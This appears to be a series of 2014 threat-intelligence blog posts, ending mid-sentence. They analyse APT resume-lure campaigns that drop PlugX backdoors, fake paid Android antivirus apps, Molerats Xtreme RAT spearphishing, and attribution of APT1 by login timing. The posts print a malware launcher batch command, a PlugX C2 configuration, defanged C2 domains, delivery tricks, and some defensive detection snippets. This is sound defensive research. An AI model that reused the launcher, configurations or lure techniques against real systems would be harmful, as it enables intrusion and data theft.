.text 917c92e8662faf96fffb8ffe7b7c80fb
.rdata 975b458cb80395fa32c9dda759cb3f7b
.data 3ed34de8609cd274e49bbd795f21acc4
.rsrc b1a55ec420dd6d24ff9e762c7b753868
.reloc afd753a42036000ad476dcd81b56b754
Import Hash fad20abf8aa4eda0802504d806280dd7
Compile date 2014-05-27 15:48:13

Contents of vc.bat:

  @echo off
  cmd.exe /C start rundll32.exe "C:\Documents and Settings\admin\Application Data\mt.dat" UpdvaMt

Details - Email Attachment #2

Through additional research, we obtained another RAR archive email attachment sent by the same attackers to an employee of another company. While there are many similarities, such as the fake resume and inclusion of TTCalc, there is one major difference: the delivery of a completely different malware backdoor. The attachment this time was named “my resume and projects.rar” and was protected with the password “TTcalc.”

Filename MD5 Hash
my resume and projects.rar ab621059de2d1c92c3e7514e4b51751a
SETUP.exe 510b77a4b075f09202209f989582dbea
my resume.pdf d1b1abfcc2d547e1ea1a4bb82294b9a3

SETUP.exe is a self-extracting RAR, which opens the WinRAR window when executed, prompting the user for the location to extract the files. It writes them to a TTCalc folder and tries to launch ttcalcBAK.exe (the malware dropper), but the path is incorrect so it fails with an error message. All of the other files are benign and related to the legitimate TTCalc application.

Filename MD5 Hash
CHANGELOG 4692337bf7584f6bda464b9a76d268c1
COPYRIGHT 7cae5757f3ba9fef0a22ca0d56188439
README 1a7ba923c6aa39cc9cb289a17599fce0
ttcalc.chm f86db1905b3f4447eb5728859f9057b5
ttcalc.exe 37c6d1d3054e554e13d40ea42458ebed
ttcalcBAK.exe 3e7430a09a44c0d1000f76c3adc6f4fa

The file ttcalcBAK.exe is also a self-extracting RAR, which drops and launches chrome_frame_helper – a Backdoor.APT.Kaba (aka PlugX/Sogu) backdoor that uses a legitimate Chrome executable to load the malicious DLL via side-loading. Although this backdoor is used by multiple threat groups and is quite commonly seen these days, this is the first time we've observed this particular threat group using this family of malware. The malware was configured to communicate with the command and control domain www[.]walterclean[.]com ( at the time of discovery) using the binary TCP protocol only. The file details are below, followed by the malware configuration.
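Side-loading layouts like this one are easy to pre-filter for: a legitimate EXE sitting beside a same-named DLL (chrome_frame_helper.exe and chrome_frame_helper.dll here) is a classic PlugX pattern. A minimal triage sketch (our own heuristic, not taken from this post):

```python
import os

def sideload_candidates(directory: str) -> list:
    """Return base names that appear as both <name>.exe and <name>.dll in
    the same directory -- a common DLL side-loading layout worth triaging."""
    names = os.listdir(directory)
    exes = {n[:-4].lower() for n in names if n.lower().endswith(".exe")}
    dlls = {n[:-4].lower() for n in names if n.lower().endswith(".dll")}
    return sorted(exes & dlls)
```

A match is only a lead, not a verdict: plenty of legitimate software ships EXE/DLL pairs, so candidates still need signature and behavior checks.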

Filename MD5 Hash
chrome_frame_helper.dll 98eb249e4ddc4897b8be6fe838051af7
chrome_frame_helper.dll.hlp 1b57a7fad852b1d686c72e96f7837b44
chrome_frame_helper.exe ffb84b8561e49a8db60e0001f630831f


Metadata MD5 Hash
chrome_frame_helper.dll 98eb249e4ddc4897b8be6fe838051af7
.text dfb4025352a80c2d81b84b37ef00bcd0
.rdata 4457e89f4aec692d8507378694e0a3ba
.data 48de562acb62b469480b8e29821f33b8
.reloc 7a7eed9f2d1807f55a9308e21d81cccd
Import hash 6817b29e9832d8fd85dcbe4af176efb6
Compile date 2014-03-22 11:08:34

Backdoor.APT.Kaba Malware Configuration:

PlugX Config (0x150c bytes):

Flags: False True False False False False True True True True False

Timer 1: 60 secs

Timer 2: 60 secs

C&C Address: www[.]walterclean[.]com:443 (TCP)

Install Dir: %ALLUSERSPROFILE%\chrome_frame_helper

Service Name: chrome_frame_helper

Service Disp: chrome_frame_helper

Service Desc: Windows chrome_frame_helper Services

Online Pass: 1234

Memo: 1234

Open Source Intel

The domain walterclean[.]com shares registration details with securitywap[.]com:

The following domains are registered to QQ360LEE@126.COM

Domain: walterclean[.]com

Create Date: 2014-03-26 00:00:00

Registrar: ENOM, INC.

Domain: securitywap[.]com

Create Date: 2014-03-26 00:00:00

Registrar: ENOM, INC.
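The registrant pivot above (both domains registered to the same email on the same day through the same registrar) is a staple of infrastructure analysis, and can be expressed as a simple grouping over WHOIS records. The records below restate only the data given in this section:

```python
# WHOIS data as reported above
WHOIS_RECORDS = [
    {"domain": "walterclean[.]com", "email": "QQ360LEE@126.COM",
     "created": "2014-03-26", "registrar": "ENOM, INC."},
    {"domain": "securitywap[.]com", "email": "QQ360LEE@126.COM",
     "created": "2014-03-26", "registrar": "ENOM, INC."},
]

def domains_for_registrant(records, email):
    """Group domains that share a registrant email (case-insensitive)."""
    return sorted(r["domain"] for r in records
                  if r["email"].lower() == email.lower())
```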


In short, we attributed these attacks to the same threat actor responsible for “Operation Clandestine Fox,” based on the following linkages:

  • The first-stage malware (mt.dat) is a slightly updated version of the Backdoor.APT.CookieCutter malware dropped during Operation Clandestine Fox
  • Based on our intel, Backdoor.APT.CookieCutter has been used exclusively by this particular threat group
  • Finally, the command and control domain inform[.]bedircati[.]com seen in this activity was also used during the Clandestine Fox campaign

Another evolutionary step for this threat group is that they have diversified their tool usage by adopting the Kaba/PlugX/Sogu malware – something we have never seen them do before.

As we have noted in other blog posts, APT threat actors take advantage of every possible vector to try to gain a foothold in the organizations they target. Social networks are increasingly used for both personal and business reasons, and are one more potential threat vector that both end-users and network defenders need to think about.

Unfortunately, it is very common for users to let their guard down when using social networks or personal email, since they don’t always treat these services with the same level of risk as their work email.  As more companies allow their employees to telecommute, or even allow them to access company networks and/or resources using their personal computers, these attacks targeting their personal email addresses pose significant risk to the enterprise.


 The author would like to acknowledge the following colleagues for their contributions to this report: Josh Dennis, Mike Oppenheim, Ned Moran, and Joshua Homan.

Preying on Insecurity: Placebo Applications With No Functionality on Google Play and

FireEye mobile security researchers recently uncovered a series of anti-virus and security configuration apps that were nothing more than scams, and notified Google and Amazon so the apps could be taken down. Written easily by a thieving developer with just a few hundred lines of code, then covered with a facade of images and progress bars, these seemingly useful Android apps charge for installation and upgrades but do nothing. In other words, placebo applications. Fortunately, all of the applications have been removed from the Google Play store as a result of our discovery.

With up to 50,000 downloads in some cases, these fake apps highlight how cybercriminals are exploiting the security concerns consumers have about the Android platform. In this case, we found five (!) fake antivirus apps that do nothing other than take a security-conscious user’s money, leave them unprotected from mobile threats, and earn a criminal thousands of dollars for little work.

Uploaded by a developer named Mina Adib, the paid versions of the apps were available to Google Play customers outside the US and UK, while users in the UK and US could choose the free versions with in-app upgrade options. Also available in third-party markets such as [1] and [2], the fraudulent apps ranged in price from free to $3.99. The applications included:

  1. Anti-Hacker PLUS (com.minaadib.antihackerplus) Price $3.99
  2. JU AntiVirus Pro (com.minaadib.juantiviruspro) Price $2.99
  3. Anti-Hacker (com.minaadib.antihacker) Free
  4. Me Web Secure (com.minaadib.mewebsecurefree) Free
  5. Me Web Secure Pro (com.minaadib.mewebsecure) Price $1.99
Taking full advantage of the legacy, signature-based approach mobile antivirus apps have adopted, which makes it hard for a user to tell whether an app is really working, total charges for these “security” apps ran into the thousands of US dollars in the Google Play store alone. This old security model puts users relying on such applications at risk, either because it incites them to download apps that simply have no functionality, as we see in this case, or because the apps don’t provide adequate protection against today’s threats. Ultimately, users simply cannot tell when they are protected.

    1. Anti-Hacker (com.minaadib.antihacker) Free

    [caption id="attachment_5567" align="aligncenter" width="600"]Fig. 1. Free Version of Anti-Hacker app in Google Play store.[/caption]

    This application claims to protect mobile devices from hackers but, as with all of these apps, it is a scam, incapable of scanning the phone at all. Although there is a “Scan Now” button in the middle of the layout, pressing it only shows a superficial progress bar; after a few seconds of running, a toast message of “Your Android is clean” is shown.

    The picture below shows the main interface of the application.

    [caption id="attachment_5570" align="aligncenter" width="302"]Fig. 2. The UI of the Anti-Hacker app.[/caption]

    The following code is executed when the user clicks the “Scan Now” button.

    As shown in the code, nothing happens when the button is clicked. The toast message of “Your Android is clean” is then shown in the onDismiss() method.
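The decompiled code itself is not reproduced here; as a rough sketch of the placebo logic (written in Python for illustration rather than the app's actual Java), the "scan" amounts to nothing more than a delay followed by a fixed message:

```python
import time

def fake_scan(delay_seconds=3):
    """Mimics the placebo 'Scan Now' handler: no device state is ever read."""
    time.sleep(delay_seconds)       # the superficial progress bar
    return "Your Android is clean"  # the fixed toast shown in onDismiss()

print(fake_scan(delay_seconds=0))  # "Your Android is clean", regardless of device
```

The same structure covers the fake Update and kill-tasks buttons described below: a timer, then a hard-coded success message, with no inspection of the device at any point.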

    [caption id="attachment_5575" align="aligncenter" width="307"]Fig. 3. The toast message of the Anti-Hacker screen.[/caption]

    The same trick is used for the software update, which also does nothing. When the Update button is clicked, a progress bar appears with the text “Updating the Database...”, which later changes to “Database updated Successfully”.

    2. Anti-Hacker PLUS (com.minaadib.antihackerplus) Price $3.99

    Figs. 4 and 5 show the paid version of the application com.minaadib.antihacker. Its source code is almost the same as the free version’s, meaning this application doesn’t perform scanning either. When the user presses the Scan button, the application displays the progress bar for some time and then shows the same notification stating the device is “clean.”

    [caption id="attachment_5577" align="aligncenter" width="549"]Fig. 4. The Anti-Hacker Plus app in Google Play[/caption]

    [caption id="attachment_5600" align="aligncenter" width="552"]Fig. 5. Anti-Hacker Plus app in[/caption]

    The paid version does add one “feature,” however. It offers the ability to kill running apps and tasks, which, in reality, is just a line of code that waits one second after being activated before popping up a toast notification saying it has killed all tasks. You can see this lack of useful functionality in the code below:


    3. JU AntiVirus Pro (com.minaadib.juantiviruspro) Price $2.99

    This application claims to be an antivirus application that detects malware; however, it actually follows the same pattern as the two scam apps above. It simply shows a progress bar for a period of time, as though it is doing something, and then displays “Device is clean.” The source code behind the “Scan” button is similar to that of the applications above.

    [caption id="attachment_5580" align="alignnone" width="599"]Fig. 6. JU Anti-Virus Pro in Google Play store.[/caption]

    The image and the source code below show that the Scan button is a fake.

    [caption id="attachment_5581" align="aligncenter" width="429"]Fig. 7. The Scan button in JU Anti-Virus Pro app.[/caption]


    4. Me Web Secure  (com.minaadib.mewebsecurefree) Free

    This application is a slightly different security tool, offering configuration settings for things like browsing and cookies. Just like the apps above, these are no more than superficial layouts on top of empty code. Cleverly, the developer disabled some of the options in the free version so users feel compelled to pay to enable them.

    [caption id="attachment_5584" align="aligncenter" width="586"]Fig. 8. Me Web Secure app in Google Play store.[/caption]

    [caption id="attachment_5585" align="aligncenter" width="401"]Fig. 9. Me Web Secure app UI.[/caption]

    5. Me Web Secure Pro (com.minaadib.mewebsecure) Price $1.99

    Similar to its free counterpart, com.minaadib.mewebsecurefree, this application shows security and network configuration screens that are simply UI layouts. As stated above, the options disabled in the free version are enabled in the paid version, but no source code was ever written behind them, not even fake code to simulate those features.

    [caption id="attachment_5589" align="aligncenter" width="600"]Fig. 10. The Me Web Secure Pro app in Google Play Store.[/caption]

    In the image below, the app appears to be performing configuration when the “ON” button is pressed.

    [caption id="attachment_5590" align="aligncenter" width="401"]Fig. 11. Scan button in the Me Web Secure Pro app.[/caption]

    The image below shows the code path executed when the ON button is clicked: a five-second progress bar that exists only for visual purposes. No configuration is performed by the application.





    Molerats, Here for Spring!

    Between 29 April and 27 May, FireEye Labs identified several new Molerats attacks targeting at least one major U.S. financial institution and multiple European government organizations.

    When we last published details relevant to Molerats activity in August of 2013, we covered a large campaign of Poison Ivy (PIVY) attacks directed against several targets in the Middle East and the United States. We felt it was significant to highlight the previous PIVY campaigns to:

    1. Demonstrate that any large-scale, targeted attacks utilizing this off-the-shelf Remote Access Tool (RAT) shouldn’t be automatically linked to Chinese threat actors.
    2. Share several documented tactics, techniques, and procedures (TTP), and indicators of compromise (IOC) for identifying Molerats activity.

    However, this was just one unique facet of a much broader series of related attacks dating back to as early as October 2011 that are still ongoing. Previous research has linked these campaigns to Molerats, but with so much public attention focused on APT threat actors based in China, it’s easy to lose track of targeted attacks carried out by other threat actor groups based elsewhere. For example, we recently published the "Operation Saffron Rose" whitepaper, detailing a rapidly evolving Iranian-based threat actor group known as the “Ajax Security Team."

    New Attacks, Same Old Tactics

    With the reuse of command and control (CnC) infrastructure and a similar set of TTPs, Molerats activity has continued to be tracked, and the group’s target list has grown to include:

    • Palestinian and Israeli surveillance targets
    • Government departments in Israel, Turkey, Slovenia, Macedonia, New Zealand, Latvia, the U.S., and the UK
    • The Office of the Quartet Representative
    • The British Broadcasting Corporation (BBC)
    • A major U.S. financial institution
    • Multiple European government organizations

    Previous Molerats campaigns have used several garden-variety, freely available backdoors such as CyberGate and Bifrost but, most recently, we have observed them making use of the PIVY and Xtreme RATs. Previous campaigns made use of at least one of three observed forged Microsoft certificates, allowing security researchers to accurately tie together separate attacks even when those attacks used different backdoors. There also appears to be a habitual use of lure or decoy documents, in either English or Arabic, with content focusing on active conflicts in the Middle East. The lures come packaged with malicious files that drop the Molerats’ flavor of the week, which in these most recent campaigns happens to be Xtreme RAT binaries in every case.

    Groundhog Day

    On 27 May we observed at least one victim downloading a malicious .ZIP file as the result of clicking on a shortened Google URL (http://goo[.]gl[/]AMD3yX), likely contained inside a targeted spearphishing email. However, we were unable to confirm this for this particular victim:


    1) “حصري بالصور لحظة الإعتداء على المشير عبد الفتاح السيسي.scr” 
(MD5: a6a839438d35f503dfebc6c5eec4330e)

    • Malicious download URL was sent to a well-known European government organization.
    • The shortened URL breaks out to “http://lovegame[.]us/Photos[.]zip,” which was clicked/downloaded by the victim.
    • The extracted binary, “حصري بالصور لحظة الإعتداء على المشير عبد الفتاح السيسي.scr,” opens up a decoy Word document and installs/executes the Xtreme RAT binary into a temp directory, “Documents and Settings\admin\Local Settings\Temp\Chrome.exe.”
    • The decoy document, “rotab.doc,” contains three images (a political cartoon and two edited photos), all negatively depicting former military chief Abdel Fattah el-Sisi.
    • Xtreme RAT binary dropped: “Chrome.exe” (MD5: a90225a88ee974453b93ee7f0d93b104), which is unsigned.
    • As of 29 May, the URL has been clicked 225 times by a variety of platforms and browser types, so the campaign was likely not limited to just one victim.
    • Two of the download referrers are webmail providers, further indicating the malicious URL was likely disseminated via spearphishing emails.

    On 29 April we observed two unique malicious attachments being sent to two different victims via spearphishing emails:

    2) 8ca915ab1d69a7007237eb83ae37eae5

    • Malicious file sent to both the financial institution and Ministry of Foreign Affairs targets.
    • Drops an Arabic language decoy document titled “Sisi.doc”, which appears to contain several copy/pasted excerpts of remarks by (now retired) Egyptian Major General Hossam Sweilem discussing military strategy and the Muslim Brotherhood.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic. As noted in our August 2013 blog post, this could possibly be a poor attempt to frame China-based threat actors for these attacks.
    • Xtreme RAT binary dropped: “sky.exe” (MD5: 2d843b8452b5e48acbbe869e51337993), which is unsigned.


    3) “Too soon to embrace Sisi _ Egypt is an unpredictable place.scr" (MD5: 7f9c06cd950239841378f74bbacbef60)

    • Malicious file only sent to a European government organization.
    • Drops an English language decoy document also titled “Sisi.doc”, however this one appears to be an exact copy of a 23 April Financial Times’ news article about the uncertainties surrounding former military chief Abdel Fattah el-Sisi running for president in the upcoming Egyptian elections.
    • Drops the same Xtreme RAT binary: “sky.exe” (MD5: 2d843b8452b5e48acbbe869e51337993), which is unsigned.

    Another attribute regularly exhibited by Molerats malware samples is that they are often archived inside self-extracting RAR files and encoded with EXECryptor V2.2, alongside several other legitimate-looking archived files.

    Related Samples

    Both of the malicious files above have a compile date/time of 2014-04-17 09:43:29-0000, and based on this information we were able to identify five additional samples related to the 29 April attacks (one sample contained only a lure and no malicious binary). These samples were a little more interesting because they contained an array of forged or self-signed Authenticode certificates.

    All of the additionally identified samples were sent to one of the same European government organizations mentioned previously.

    4) 2b0f8a8d8249402be0d83aedd9073662

    • Drops an Arabic language Word Document titled “list.doc”.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic.
    • Xtreme RAT binary dropped: “Download.exe” (MD5: cff48ff88c81795ee8cebdc3306605d0). This malware is signed with a self-signed certificate issued by “FireZilla” (see below). Certificate serial number: {75 dd 9b 14 c6 6e 20 0b 2e 22 95 3a 62 7b 39 19}.


    Forged FireZilla certificate

    5) 4f170683ae19b5eabcc54a578f2b530b

    • Drops an Arabic language Word Document titled “points.doc,” which appears to be an online clipping from a news article about ongoing Palestinian reconciliation meetings between Fatah and Hamas in the Gaza strip.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic.
    • Xtreme RAT binary dropped: “VBB.exe” (MD5: 6f9585c8748cd0e7103eab4eda233666). Though the malware appeared to be signed with a certificate named “Kaspersky Lab”, the real hash did not match the signed hash (see below). Certificate serial number: {a7 ed a5 a2 15 c0 d1 91 32 9a 1c a4 b0 53 eb 18}.


    (Forged Kaspersky Lab certificate)
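The two bad certificates above suggest a simple triage rule: flag signatures whose issuer matches the subject (self-signed, as with “FireZilla”) or whose signed hash does not match the file's real hash (forged, as with “Kaspersky Lab”). A sketch over hypothetical, pre-parsed certificate metadata (the field names are illustrative, not any real parser's output):

```python
def triage_signature(cert):
    """Classify a (hypothetical, pre-parsed) code-signing record."""
    if cert["issuer"] == cert["subject"]:
        return "self-signed"            # e.g. the "FireZilla" certificate
    if cert["signed_hash"] != cert["real_hash"]:
        return "forged"                 # e.g. the fake "Kaspersky Lab" certificate
    return "valid-looking"

firezilla = {"issuer": "FireZilla", "subject": "FireZilla",
             "signed_hash": "aa", "real_hash": "aa"}
kaspersky = {"issuer": "Some CA", "subject": "Kaspersky Lab",
             "signed_hash": "aa", "real_hash": "bb"}
print(triage_signature(firezilla))  # self-signed
print(triage_signature(kaspersky))  # forged
```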

    6) 793b7340b7c713e79518776f5710e9dd & a75281ee9c7c365a776ce8d2b11d28da

    • Both drop an Arabic language Word Document titled “qatar.doc,” which appears to be an online clipping of a news article concerning members of the Gulf Cooperation Council (GCC) and the ongoing conflict in which Saudi Arabia, the United Arab Emirates (UAE), and Bahrain are all aligned against Qatar because of the country’s support for the Muslim Brotherhood.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic.
    • Xtreme RAT binary dropped by the first sample: “AVG.exe” (MD5: a51da465920589253bf32c6115072909), which is unsigned.

    7) Pivoting off one of the fake Authenticode certificates, we were able to identify at least one additional related binary, “vmware.exe” (MD5: 6be46a719b962792fd8f453914a87d3e), also Xtreme RAT, though it doesn’t appear to have been sent to any of our customers. The malicious binary is also encoded with EXECryptor V2.2, similar to the samples above, and its CnC domain has resolved to IPs that overlap with previously identified Molerats malware.

    Indicators of Compromise


    Although the samples above are all Xtreme RAT, all but two communicate over different TCP ports. The port 443 callback listed in the last sample also does not use actual SSL; instead, the sample transmits its communications in clear text, a common tactic adversaries employ to try to bypass firewall/proxy rules that apply to communications over traditional web ports. These tactics, among several others mentioned previously, suggest that Molerats are not only aware of security researchers’ efforts to track them but are also attempting to avoid any obvious, repeating patterns that could be used to more easily track endpoints infected with their malware.
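The clear-text-over-443 tactic described above lends itself to a simple network heuristic: genuine TLS sessions open with a handshake record (first byte 0x16, followed by a 0x03,0x0X protocol version), so port-443 payloads that fail this check deserve closer inspection. A sketch (the byte check is a coarse heuristic, not a protocol parser):

```python
def looks_like_tls(first_bytes: bytes) -> bool:
    """Heuristic: TLS sessions open with a handshake record (ContentType 0x16)
    followed by a 0x03,0x0X protocol version."""
    return (len(first_bytes) >= 3
            and first_bytes[0] == 0x16
            and first_bytes[1] == 0x03
            and first_bytes[2] <= 0x04)

print(looks_like_tls(bytes([0x16, 0x03, 0x01])))  # True: plausible ClientHello
print(looks_like_tls(b"GET / HTTP/1.1\r\n"))      # False: clear text on port 443
```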


    Although a large number of attacks against our customers appear to originate from China, we are tracking lesser-known actors also targeting the same firms. Molerats campaigns seem to be limited to only using freely available malware; however, their growing list of targets and increasingly evolving techniques in subsequent campaigns are certainly noteworthy.

    MD5 Samples 

    • a6a839438d35f503dfebc6c5eec4330e
    • 7f9c06cd950239841378f74bbacbef60
    • 8ca915ab1d69a7007237eb83ae37eae5
    • 2b0f8a8d8249402be0d83aedd9073662
    • 4f170683ae19b5eabcc54a578f2b530b
    • 793b7340b7c713e79518776f5710e9dd
    • a75281ee9c7c365a776ce8d2b11d28da
    • 6be46a719b962792fd8f453914a87d3e

    Older Molerats samples from Dec 2013 (not listed above)

    • 34c5e6b2a988076035e47d1f74319e86
    • 13e351c327579fee7c2b975b17ef377c
    • c0488b48d6aabe828a76ae427bd36cf1
    • 14d83f01ecf644dc29302b95542c9d35
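The hash IOCs above can be swept for with a short script: compute each candidate file's MD5 and check it against the published set. A sketch (the subset of hashes and the sample payload are illustrative):

```python
import hashlib

# Subset of the Molerats MD5 IOCs listed above.
IOC_MD5S = {
    "a6a839438d35f503dfebc6c5eec4330e",
    "7f9c06cd950239841378f74bbacbef60",
    "8ca915ab1d69a7007237eb83ae37eae5",
    "2d843b8452b5e48acbbe869e51337993",
}

def md5_of(data: bytes) -> str:
    """MD5 hex digest of a file's contents."""
    return hashlib.md5(data).hexdigest()

def is_known_sample(data: bytes) -> bool:
    """True if the payload's MD5 appears in the published IOC list."""
    return md5_of(data) in IOC_MD5S

print(is_known_sample(b"benign test content"))  # False
```

In practice the same check would be run over file contents gathered from hosts or mail gateways, feeding `is_known_sample` with each file's bytes.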

     References & Credits

    A special thanks to Ned Moran and Matt Briggs of FireEye Labs for supporting this research.


    Strategic Analysis: As Russia-Ukraine Conflict Continues, Malware Activity Rises

    Cyber conflicts are a reflection of traditional, “real life” human conflicts. And the more serious the conflict in the “real world,” the more conspicuous its cyber shadow is likely to be. So let’s look at a serious, current international conflict – the one between Russia and Ukraine – to see if we can find its reflection in cyberspace.

    One of the most reliable ways to discover computer network operations is to look for malware “callbacks” – the communications initiated from compromised computers to an attacker’s first-stage command-and-control (C2) server. At FireEye, we detect and analyze millions of such callbacks every year.

    Table 1, below, shows the top 20 countries to receive first-stage malware callbacks over the last 16 months, according to the latest FireEye data.


    Table 1 – Callback Infrastructure: the Last 16 Months

    As we track the evolution of callbacks during this period, we see a likely correlation between the overall number of callbacks both to Russia and to Ukraine, and the intensification of the crisis between the two nations. The two key indicators we see are:

    • In 2013, Russia was, on average, #7 on this list; in 2014, its average rank is #5.
    • In 2013, Ukraine was, on average, #12 on this list; in 2014, its average rank is #9.

    The biggest single monthly jump occurred in March 2014, when Russia moved from #7 to #3. In that same month, the following events also took place in Russia and Ukraine:

    • Russia’s parliament authorized the use of military force in Ukraine;
    • Vladimir Putin signed a bill incorporating the Crimean peninsula into the Russian Federation;
    • The U.S. and EU imposed travel bans and asset freezes on some senior Russian officials;
    • Russian military forces massed along the Ukrainian border; and
    • Russian energy giant Gazprom threatened to cut off Ukraine’s supply of gas.

    The graphs below provide a closer look at the crucial month of March 2014, specifically comparing it to malware callback data from February.

    Figure 1 shows a significant rise in malware callbacks to Russia from three of the top four source countries in February: Canada, South Korea, and the U.S. (Great Britain had a slight decline).


    Figure 1 – Callbacks to Russia in Feb/Mar 2014: Top Four Countries

    Figure 2 depicts the same, general rise in callbacks to Russia from many other countries around the world.


    Figure 2 – Callbacks to Russia in Feb/Mar 2014: Rest of World

    Figure 3 shows that the sharp rise in callbacks to Russia in March 2014 was seen in every FireEye industry vertical.


    Figure 3 – Callbacks to Russia in Feb/Mar 2014: Industry Verticals

    Tables 2 and 3, below, compare the rise in callbacks to Russia and Ukraine against the rise in callbacks to other countries for February and March 2014. It is important to note that nearly half of the world’s countries experienced a decrease in callbacks during this same time frame.

    Table 2 shows the countries that received the highest increase, from February to March 2014, in the number of source countries sending callbacks to them. Ukraine and Russia both placed in the top ten countries worldwide, with Ukraine jumping from 29 source countries to 39, and Russia moving from 45 to 53.


    Table 2 – Callbacks in 2014: Number of Source Countries

    Table 3 shows the increase in the number of malware signatures associated with the callbacks to each country for February and March 2014. Ukraine does not appear in the top ten (it tied for #15), but Russia was #4 on this list (again, nearly half of the world’s countries showed no increase or a decrease).


    Table 3 – Callbacks in 2014: Number of Malware Signatures

    It is not my intention here to suggest that Russia and/or Ukraine are the sole threat actors within this data set. I also do not want to speculate too much on the precise motives of the attackers behind all of these callbacks. Within such a large volume of malware activity, there are likely to be lone hackers, “patriotic hackers,” cyber criminals, Russian and Ukrainian government operations, and cyber operations initiated by other nations.

    What I want to convey in this blog is that generic, high-level traffic analysis – for which it is not always necessary to know the exact content or the original source of individual communications – might be used to draw a link between large-scale malware activity and important geopolitical events. In other words, the rise in callbacks to Russia and Ukraine (or to any other country or region of the world) during high levels of geopolitical tension suggests strongly that computer network operations are being used as one way to gain competitive advantage in the conflict.

    In the near future, we will apply this methodology to other global occurrences to further identify patterns that could provide valuable advanced threat protection insights.

    The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity

    Yesterday, the U.S. Department of Justice (DOJ) announced the indictment of five members of the Second Bureau of the People’s Liberation Army (PLA) General Staff Department’s Third Department, also known as PLA Unit 61398. This is the same unit that Mandiant publicly unmasked last year in the APT1 report. When the report was originally released, China denounced it, saying that it lacked sufficient evidence. Following the DOJ’s indictment, however, China’s usual response changed from “you lack sufficient evidence” to “you have fabricated the evidence”, calling on the U.S. to “correct the error immediately.” This is a significant evolution in China’s messaging; if the evidence is real, it overwhelmingly demonstrates China's unilateral attempts to leapfrog years of industrial development by using cyber intrusions to access and steal intellectual property.

    The evidence provided in the indictment includes Exhibit F (pages 54-56), which shows three charts based on Dynamic DNS data. These charts indicate that the named defendants (Unit 61398 members) were re-pointing their domain names at a Dynamic DNS provider during Chinese business hours from 2008 to 2013. The China work day, particularly for government offices, is very predictable, as noted on this travel site:

    "Government offices, institutions and schools begin at 8:00 or 8:30, and end at 17:00 or 17:30 with two-hour noon break, from Monday to Friday. They usually close on Saturday, Sunday and public holidays."

    What Exhibit F shows is a spike of activity on Monday through Friday around 8am in Shanghai (China Standard Time), a roughly 2-hour lull at lunchtime, and then another spike of activity from about 2pm to 6pm. The charts also show that there were very few changes in Dynamic DNS resolution on weekends.

    At Mandiant (now a FireEye company), we can corroborate the DOJ’s data by releasing additional evidence that we did not include in the APT1 report. In the APT1 report, we specified the following:

    • Over a two-year period (January 2011 to January 2013) we confirmed 1,905 instances of APT1 actors logging into their hop infrastructure from 832 different IP addresses with Remote Desktop.

    • Of the 832 IP addresses, 817 (98.2%) were Chinese and belong predominantly to four large net blocks in Shanghai which we will refer to as APT1’s home networks.

    • In order to make a user’s experience as seamless as possible, the Remote Desktop protocol requires client applications to forward several important details to the server, including their client hostname and the client keyboard layout. In 1,849 of the 1,905 (97%) APT1 Remote Desktop sessions we observed in the past two years, the keyboard layout setting was “Chinese (Simplified) — US Keyboard.”

    One thing we did not originally provide was an analysis of the time of day and day of week that these 1,905 Remote Desktop (RDP) connections occurred. However, when we look at these connections in bar chart format, obvious patterns appear:

    Figure 1: APT1 Remote Desktop login times distributed by hour of day (China Standard Time)


    Figure 2: APT1 Remote Desktop login times distributed by day of week (China Standard Time)

    Essentially, APT1 conducted almost all of the 1,905 RDP connections from 2011 to 2013:

    • (1) On weekdays (Monday through Friday), and
    • (2) between 8am and noon, 2pm and 6pm, or 7pm and 10pm CST.

    On some occasions, APT1 personnel appear to have worked on weekends, but these are minor exceptions to the norm. Consider the following evidence together for the 1,905 RDP connections:

    • 98.2% of IP addresses used to log in to hop points (which help mask the real point of origin to victim organizations) were from Shanghai networks
    • 97% of the connections were from computers using the Simplified Chinese language setting
    • 97.5% of the connections occurred on weekdays, China Standard Time
    • 98.8% of the connections occurred between 7am and midnight China Standard Time
      • 75% occurred between 8am to noon or between 2pm to 6pm
      • 15% occurred between 7pm and 10pm
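Percentage breakdowns like these fall out of a straightforward bucketing of login timestamps by hour of day and weekday in China Standard Time (UTC+8). A minimal sketch with a synthetic timestamp (not actual APT1 data):

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

CST = timezone(timedelta(hours=8))  # China Standard Time, UTC+8

def bucket_logins(timestamps_utc):
    """Count logins per CST hour-of-day and per weekday name."""
    hours, weekdays = Counter(), Counter()
    for ts in timestamps_utc:
        local = ts.astimezone(CST)
        hours[local.hour] += 1
        weekdays[local.strftime("%A")] += 1
    return hours, weekdays

# Synthetic example: one login at 01:30 UTC = 09:30 CST on a Monday.
hours, weekdays = bucket_logins([datetime(2012, 6, 4, 1, 30, tzinfo=timezone.utc)])
print(hours[9], weekdays["Monday"])  # 1 1
```

From those two counters, the weekday and working-hour percentages quoted above are just ratios of bucket totals to the overall connection count.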

    The simplest conclusion based on these facts is that APT1 is operating in China, and most likely in Shanghai. Although one could attempt to explain every piece of evidence away, at some point the evidence starts to become overwhelming when it is all pointing in one direction. Our timestamp data, derived from active RDP logins over a two year period, matches the DOJ’s timestamp data, derived from a differ